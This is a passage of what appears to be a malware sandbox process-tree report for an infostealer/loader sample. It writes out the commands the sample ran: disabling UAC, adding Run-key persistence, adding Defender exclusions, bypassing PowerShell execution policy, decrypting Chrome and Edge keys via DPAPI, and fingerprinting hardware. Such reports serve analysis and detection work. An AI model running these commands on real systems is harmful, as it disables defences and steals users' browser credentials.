      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:5732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1164
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:1856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:988
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.h0Cz7LOFn9""
      4⤵
      PID:4912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.h0Cz7LOFn9"
        5⤵
        
        PID:3128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:5100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1228
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:1356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:2172
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:1608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:224
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:5688
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:4404
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:3996
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:3088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:6120
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:3460
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:744
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\LQsM7HoaVe.ps1""
      4⤵
      PID:4988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\LQsM7HoaVe.ps1"
        5⤵
        
        PID:5656
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v5pjf0ns\v5pjf0ns.cmdline"
        6⤵
        
        PID:4756
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48F.tmp" "c:\Users\Admin\AppData\Local\Temp\v5pjf0ns\CSC59D7A79D776465AB7A66EC5E308C30.TMP"
        7⤵
        
        PID:1436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4620
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:1620
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:1104
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:5260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:1056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:3496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:5412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4968
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:1840
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:4512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.NSO1wIGiwP""
      4⤵
      PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.NSO1wIGiwP"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:3516
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4356
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5496
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:1852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:2472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:5892
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:5616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:3220
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:4516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:548
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:5032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:5840
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:5152
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:4224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:4008
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:884
    - - C:\Windows\Temp\{DC5CE6BF-F5A1-404D-B9AA-AB6101AC035B}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{DC5CE6BF-F5A1-404D-B9AA-AB6101AC035B}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=556 -burn.filehandle.self=700 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:5124
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:6016
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:4840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\Inny6S6Vyg.ps1""
      4⤵
      PID:5904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\Inny6S6Vyg.ps1"
        5⤵
        
        PID:4352
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e0p2ajtr\e0p2ajtr.cmdline"
        6⤵
        
        PID:5656
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD78.tmp" "c:\Users\Admin\AppData\Local\Temp\e0p2ajtr\CSC3CE77D84725641D696211964358C052.TMP"
        7⤵
        
        PID:2904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4564
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:2624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5660
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5208
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:2976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:1580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:3044
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1700
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:4520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:3192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.mkekLiukYU""
      4⤵
      PID:5780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.mkekLiukYU"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:2924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:2464
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4792
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:5588
    - - C:\Windows\Temp\{29031FB4-89A4-4412-B451-0EEFC7617E35}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{29031FB4-89A4-4412-B451-0EEFC7617E35}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:1308
  - - C:\Windows\system32\cmd.exe
